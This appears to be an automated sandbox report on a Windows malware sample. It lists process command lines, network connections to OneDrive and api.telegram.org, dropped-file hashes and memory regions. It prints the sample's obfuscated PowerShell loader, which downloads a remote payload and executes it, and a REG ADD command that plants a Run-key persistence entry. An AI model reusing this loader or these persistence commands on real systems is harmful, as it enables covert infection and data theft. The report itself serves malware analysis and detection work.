Har.crapruoCallguN.bronElapst Papa ') ;$Skrmformularer=$Generalizability[$Semiengaged];}$Splitflagene18=294026;$Dasyurid=28720;Silkworks (undinens ' Bely$skolegDytt,lBehavo Bla b FamiaVouchl elet: ,utgTOpholi.ocielcheert DekaaAggellRaakreTurner UncosFrans ,rst=Radio DismoGCaps eSul,ut Alch-Ti.diCSl tloAuerbnH nortEn.ste,jemunHali.tTopfo Inter$Fl.ttLBesnaoLiparcSkuldaDee wlGrundiHjertzsmatte,ahitsCalvi ');Silkworks (undinens 'bisku$DrivrgTryktl UnstoFjerdbReklaaSporelRadbu:WildwIBar,enMarskt obbe passrS,ratnKonveaLevitt U,sviMaudlo,kovsnMus eaBit,elExoe,s Pern Vimp=apoph Pepos[ teroSHeaveyFidussfremft Gla,eYentnmKn,ld.Paon CrinkeoretronFuch,vE.fekeMolesrAf pnt Forh] hot: Sema:nazi.FJor,orKugleoPovelmKogevB Relea Epi.sScissePods,6Phill4Stvl.S Pr.st Platr SjleiGtem.nEksiggIndol(Spill$Plat T.oncliUnanalSubmatStivnaArv klJunnie AmnerKonfesCapit)Lugni ');Silkworks (undinens ' dias$S andg DroglM,sseoC entb ikra,oatmlAkt,t:Eks.rCTorstaSkak tDoleraU,snipDensihBaadey Uns.l TchalApp.aaF.rhrrAfkrvy .ean Filt= frop Nonco[KoksjSAfbe.yTr.pasUds.ytHolyse .urrmUrteg.VelseT Desiet,ldexDenu,tsided.TilsiE Helhn .ljlc BandoChir dUrbaniRegisnGrinnglogwa]Fetia:Ampli: SkueA orsuSpropoC El cIIn ynITynds.Theo GShaheeJinket refuS.melttEpicorChas.i celdn.uleggOv.rp(Subtl$ ScytIHvidenZostetHumane.urghrGetaenKysteaModert Pr,eiFrostoCentrnX.logaHaandlCal ssApp r)Af ol ');Silkworks (undinens 'Putz.$Psy,hgSensilXyl to PirabStat.aSkomalBefra:P eobPReforhMoer oInfo.sIon.sp fedth ftneoCalamrErigeyDragalNeotea.ormltUafgjiYisflnQu.ckg E,em1Mos u0 Sten6 fspn=Uvsen$SignaC veraD.strtSyn.eaNattep OverhInteryAbsenl C,unlD.abeaInterrPar,eyPo tl.KolkhsBilliuSystebRehonsScummtEfterr Unmoi,rundn R mpgDestr(,ngul$Udv kSClimapForcil FedeiS,ivetRu,rifSvlgkl.rflaaNonubg u,deeKadetn TekneVolds1Skyro8 Forh,Gn st$ ta.lDProklaMid,esfa,mey .lenuSkarrrMountiLva udBeton)Sa,co ');Silkworks $Phosphorylating106;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Centroid.Arb && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enriched = 1;Function undinens($Kommanderede){$Vejoverskringensndregulering=$Kommanderede.Length-$Enriched;$Unsublimed='Substring';For( $Vejoverskringens=5;$Vejoverskringens -lt $Vejoverskringensndregulering;$Vejoverskringens+=6){$Tatovren+=$Kommanderede.$Unsublimed.Invoke( $Vejoverskringens, $Enriched);}$Tatovren;}function Silkworks($Jordfyldens){ . ($Capriccettos) ($Jordfyldens);}$Brevteksten=undinens 'ProcrMbarbeo.ypotz VagaiR.vallEmbuslNo,itaForeb/ Durb5Hyp,r. Afdr0Prgn opody( H,nvWGoalei MalinVarekdS,mploS ovlw CetasTiltu OkkupN Pa,tTpu lm A.skr1danie0 Tris.Stads0Disbe; Tig. DroolWgeneriviewpnAs.hy6 Bram4Rigsa;,uccu NonvxXenop6 Erhv4Geant; T ta .ttterEksprvPo,en: Xiph1Gues 2 Funk1 Unhi.Repoi0K ist)Vatic RegneGCiv.le Thumc Tr,nkAssesoEngra/,deka2Reeve0Exant1Broc.0A lvn0Anorm1Hyd o0Trust1bu dl Regn.FSkri.iUric.rVese,eKu.vefImprooTankax Vine/ .ice1Tita.2 F,re1 Mode. Lekt0s rob ';$Outlast=undinens 'S.udeUGe.mes Bid eCash.rMaski-Lisb Ab komgReolpeOrdrenCen stIndkb ';$Skrmformularer=undinens 'Non nhFol,et rustt SpurpChowdsSlagt:La,er/F,rti/LaaneoReexhnHaa.deBegynd Iso rPrecaiB.girvProdie afvi.agterl PrusiAf,alvUnblie unte. 
intacHistoowineymApote/ ,aledD.naio Li.iwConfan BopllEpithoChampaOverrdMetap?Sto.vrKe,eseAlib.sLs eriAllehdBr,de=Usand1Cavi,FAfsluDfinanFForov2Socia0 Chlo5DuctuB S edBDistoDHotel5StnksFIsbry9.ermoF Godk5 Lacc%Natio2Untru1Arumu2Local5Kompl6Son e6Proco&MisgoaScu.uuHerb,tIntorhMininkResknePilloySkill=uddel!BremsA hoveF Va egIn.dk0I,nerNAnteccSimseS AarsNHaan 1Bedron IllaO itrotArteroPodzo5Sag.bcRitua ';$Servitutheftede=undinens ' Bema> ,rst ';$Capriccettos=undinens 'ReguiirefleeOuistxH,mot ';$Tenures='opskriv';$Autokraternes = undinens 'Filame M rvcTuberhBrusqoNeoza Safin%Frot.a KakipChoirpKasmid bawlaTekstteva,uaReans%skr,p\PartiCAdm,re OvernMusi.tKvadrr UbesoU,opoiJarlddLsb,a.GidegAD casrAr ejbBelnn Fodga&Dag n&,choc Tyroge GamicLejeah MarkoForfa alamtB,gge ';Silkworks (undinens 'swerd$AntiggResealTitalointerbTr giaMilitl Phys:eternF leabiBrinklConveiRememgD karrAfmataPard,ndesse=Waggo(SejlrcSkrifmBeeswdDdlk Synd/S,opfc Pr g Recri$Aegi ASamm uDisketRendeo mirak,nterrT,iuna F,ugtSesque DesprSytjenatomieSkandsDenat)Forar ');Silkworks (undinens 'Loise$lifergHuldslHunnioKnbe,bSmlehaSerislspild:VarsoGOffene Unq n NonteOutdirDumstaBe,fil LinniFagblz Sk.vaTelesbP enoiOstrelZ,gomiMarcitUndery Blya=Koje,$SlyngSToxoskAttesr BekemKombifPljniosubanr.epermYde,gu Prytloverla.valur SrineUtopirLandb.Svejss BrnepKr.dilfringic,pryt,aloc(Kl,en$ poinSPolyae flberGalopvShe,tiBundotSkiftuO scotShivehhypoaeDrivvfUrugutSkibieSnitcdTakine tros)Fryse ');$Skrmformularer=$Generalizability[0];$Fribblers107= (undinens 'fje l$ Quadg FrellKry boPrisobdispoaSprnglStrab:HyperST ggeeCarbonGamays ,ecoo,rmgarKarneeInvesr Bioen KlodeBlodt=MekanNKneeheCumbewAer.b-SubtuOKnfalbKaffejAb.ike,uttecPaschtSger. Sv.ghSScenayAnvensNav etkoldkeFurolmAgist.OkkupN Bence Lwoktneom,. OpskWKlatveFemdobFremdCUnsublAnisoi EvigeBlindn eplt');$Fribblers107+=$Filigran[1];Silkworks ($Fribblers107);Silkworks (undinens 'P.oto$,ammoSVict,eDimernbrndessk,ksoAnt,prUntroeTransrThro.nNarreeBadul. 
NonrH edake ,ysaaAntiodHjemmePtysmrConvesRimel[Shimp$SpartO D spuDuodetIntrolRocceaTelevs Tasstoffer]C.nvi=Frems$ CliqBGreasrmargee IncivInkjet C,oseFlskek GnocsTeleft VulpeJenomn Bade ');$Privilegiesystem=undinens 'Navle$UntilSBesmreSvesknTautosGlamoo ,moerBesl e Str,rVarienHvelsePer s.OversD Sul,oEvillwEst nnTrusslAcc,io fetaaAc.iddupfliF D esiOphrslTilfleda.ii(Anath$ ,ncoSSkppekApostr sphamtilskf DrosoVej.brPi atmReautu,redvlOverraH,nharIdenteD,merr.atio, Outb$SadelLHelgaoDumpec ToilaisocolDegeni ,itrzyab,yeSolonsSkjor)Rewid ';$Localizes=$Filigran[0];Silkworks (undinens 'relat$ScammgskarplUnderoBrandbSwiviaNilomlJanet:.laadFArme.o .attr elvmsAfsenoNichonBli.kiHorsen.eftegFaksieP rsonVertisChola=Assoc(UnrolTRappeeSkrnesSkal,tThorg-StrafPKiteda.araltudvikhTa,df Venst$ RhymLSphygocollecByw,laDefrolAffaliExpedz SteneC,codsCrawf)befal ');while (!$Forsoningens) {Silkworks (undinens ' Fois$SubmugOmbrylund,ko yewobPropoaTaarelBalti:NoncoF BarngN.ikatSailceDutchm AttaeDecims Da,otK.tteemacrorLslod= Penr$ NongtPhytorAltisudisoxeHovn ') ;Silkworks $Privilegiesystem;Silkworks (undinens 'MochaSEx ret Pe,aaSincerEncultLan,o-A.iatSNaadel axaeCon reTron pA,red Demar4Qua r ');Silkworks (undinens 'Hors.$CarbogTilbalDominocre tbMoorua,nsnal,otel:SekstFAuditoSp.acrT,ymos,tjpuoLu thn SeksilangrnAnf.egTi,dieSaetnnCatc,sDdsd.=opdag(lovm.T pstieA.ghas R ngt Aero- he ePMyz.saPov,lt TilshTatov Ferr.$helseLUdvejo GordcUndfaaIsbl,lB,rgiiGi.bozLabore,ubsssud.an)Vials ') ;Silkworks (undinens 'Noasu$Microg Predl vil o CentbStofhaCsareltempe:conteS olute Ha,imi aliiConsoeFiskencartogSlanda UlykgUovere Keynd Fini=Re.is$ PseugBevbnl h teoMisexbQuinqa Du,llbrdre:Disr M tnkeiTvivls .empaSav,lpEukarpansgnlFjel,i Sp,reBort,sflske+Rota.+,palt% Blub$SkovaGKundeeTransn F ree xagrSup,ra nhabl PriniUnintzAggrea IsohbSpil.iLovinlSvineiCutlitTestmy orma. 
Har.crapruoCallguN.bronElapst Papa ') ;$Skrmformularer=$Generalizability[$Semiengaged];}$Splitflagene18=294026;$Dasyurid=28720;Silkworks (undinens ' Bely$skolegDytt,lBehavo Bla b FamiaVouchl elet: ,utgTOpholi.ocielcheert DekaaAggellRaakreTurner UncosFrans ,rst=Radio DismoGCaps eSul,ut Alch-Ti.diCSl tloAuerbnH nortEn.ste,jemunHali.tTopfo Inter$Fl.ttLBesnaoLiparcSkuldaDee wlGrundiHjertzsmatte,ahitsCalvi ');Silkworks (undinens 'bisku$DrivrgTryktl UnstoFjerdbReklaaSporelRadbu:WildwIBar,enMarskt obbe passrS,ratnKonveaLevitt U,sviMaudlo,kovsnMus eaBit,elExoe,s Pern Vimp=apoph Pepos[ teroSHeaveyFidussfremft Gla,eYentnmKn,ld.Paon CrinkeoretronFuch,vE.fekeMolesrAf pnt Forh] hot: Sema:nazi.FJor,orKugleoPovelmKogevB Relea Epi.sScissePods,6Phill4Stvl.S Pr.st Platr SjleiGtem.nEksiggIndol(Spill$Plat T.oncliUnanalSubmatStivnaArv klJunnie AmnerKonfesCapit)Lugni ');Silkworks (undinens ' dias$S andg DroglM,sseoC entb ikra,oatmlAkt,t:Eks.rCTorstaSkak tDoleraU,snipDensihBaadey Uns.l TchalApp.aaF.rhrrAfkrvy .ean Filt= frop Nonco[KoksjSAfbe.yTr.pasUds.ytHolyse .urrmUrteg.VelseT Desiet,ldexDenu,tsided.TilsiE Helhn .ljlc BandoChir dUrbaniRegisnGrinnglogwa]Fetia:Ampli: SkueA orsuSpropoC El cIIn ynITynds.Theo GShaheeJinket refuS.melttEpicorChas.i celdn.uleggOv.rp(Subtl$ ScytIHvidenZostetHumane.urghrGetaenKysteaModert Pr,eiFrostoCentrnX.logaHaandlCal ssApp r)Af ol ');Silkworks (undinens 'Putz.$Psy,hgSensilXyl to PirabStat.aSkomalBefra:P eobPReforhMoer oInfo.sIon.sp fedth ftneoCalamrErigeyDragalNeotea.ormltUafgjiYisflnQu.ckg E,em1Mos u0 Sten6 fspn=Uvsen$SignaC veraD.strtSyn.eaNattep OverhInteryAbsenl C,unlD.abeaInterrPar,eyPo tl.KolkhsBilliuSystebRehonsScummtEfterr Unmoi,rundn R mpgDestr(,ngul$Udv kSClimapForcil FedeiS,ivetRu,rifSvlgkl.rflaaNonubg u,deeKadetn TekneVolds1Skyro8 Forh,Gn st$ ta.lDProklaMid,esfa,mey .lenuSkarrrMountiLva udBeton)Sa,co ');Silkworks $Phosphorylating106;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Centroid.Arb && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "merrows" /t REG_EXPAND_SZ /d "%Creepingly35% -w 1 $Polydactylous=(Get-ItemProperty -Path 'HKCU:\Decarbonylate\').Krydsrevidcrr;%Creepingly35% ($Polydactylous)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "merrows" /t REG_EXPAND_SZ /d "%Creepingly35% -w 1 $Polydactylous=(Get-ItemProperty -Path 'HKCU:\Decarbonylate\').Krydsrevidcrr;%Creepingly35% ($Polydactylous)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | kructg.dm.files.1drv.com | udp |
| US | 13.107.42.12:443 | kructg.dm.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 11.137.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 13.107.42.12:443 | kructg.dm.files.1drv.com | tcp |
| US | 13.107.42.12:443 | kructg.dm.files.1drv.com | tcp |
| US | 13.107.42.12:443 | kructg.dm.files.1drv.com | tcp |
| US | 13.107.42.12:443 | kructg.dm.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | krvlwa.dm.files.1drv.com | udp |
| US | 13.107.42.12:443 | krvlwa.dm.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
memory/1540-0-0x00007FFF96273000-0x00007FFF96275000-memory.dmp
memory/1540-6-0x0000020B6B380000-0x0000020B6B3A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kwl2ia4x.xg4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1540-11-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/1540-12-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/1540-13-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/1540-14-0x00007FFF96273000-0x00007FFF96275000-memory.dmp
memory/1540-16-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/1540-18-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/1540-19-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/3076-20-0x0000000004F80000-0x0000000004FB6000-memory.dmp
memory/3076-21-0x00000000055F0000-0x0000000005C18000-memory.dmp
memory/3076-22-0x0000000005CA0000-0x0000000005CC2000-memory.dmp
memory/3076-23-0x0000000005E40000-0x0000000005EA6000-memory.dmp
memory/3076-24-0x0000000005EB0000-0x0000000005F16000-memory.dmp
memory/3076-34-0x0000000005F20000-0x0000000006274000-memory.dmp
memory/3076-35-0x0000000006500000-0x000000000651E000-memory.dmp
memory/3076-36-0x0000000006540000-0x000000000658C000-memory.dmp
memory/3076-37-0x0000000007D50000-0x00000000083CA000-memory.dmp
memory/3076-38-0x0000000006AA0000-0x0000000006ABA000-memory.dmp
memory/3076-39-0x00000000077B0000-0x0000000007846000-memory.dmp
memory/3076-40-0x0000000007740000-0x0000000007762000-memory.dmp
memory/3076-41-0x0000000008980000-0x0000000008F24000-memory.dmp
C:\Users\Admin\AppData\Roaming\Centroid.Arb
| MD5 | ce5ca0bde39e064c961ec6739bda354f |
| SHA1 | 24aeeaece7e524d91aae4146804c78399689154b |
| SHA256 | f3a354a25146ca2333ceba147f2d6dbf947ce6c93e05821af208ff4a200d87e2 |
| SHA512 | 67ef4e09bd99f5aeeabe1ff4124a31175845fb8f140997e62578ad98e96ded54ba207b6684b062971e8943ca907a211a26713116747036cb739903e9a2edf3ca |
memory/3076-43-0x0000000008F30000-0x000000000E193000-memory.dmp
memory/1540-45-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/4796-52-0x0000000001200000-0x0000000002454000-memory.dmp
memory/4796-54-0x0000000001200000-0x000000000123A000-memory.dmp
memory/4796-53-0x0000000001200000-0x0000000002454000-memory.dmp
memory/4796-57-0x0000000025A30000-0x0000000025ACC000-memory.dmp
memory/1540-58-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/4796-59-0x0000000025930000-0x0000000025948000-memory.dmp
memory/4796-60-0x0000000025E50000-0x0000000025EA0000-memory.dmp
memory/4796-65-0x00000000268D0000-0x0000000026962000-memory.dmp
memory/4796-66-0x00000000268A0000-0x00000000268AA000-memory.dmp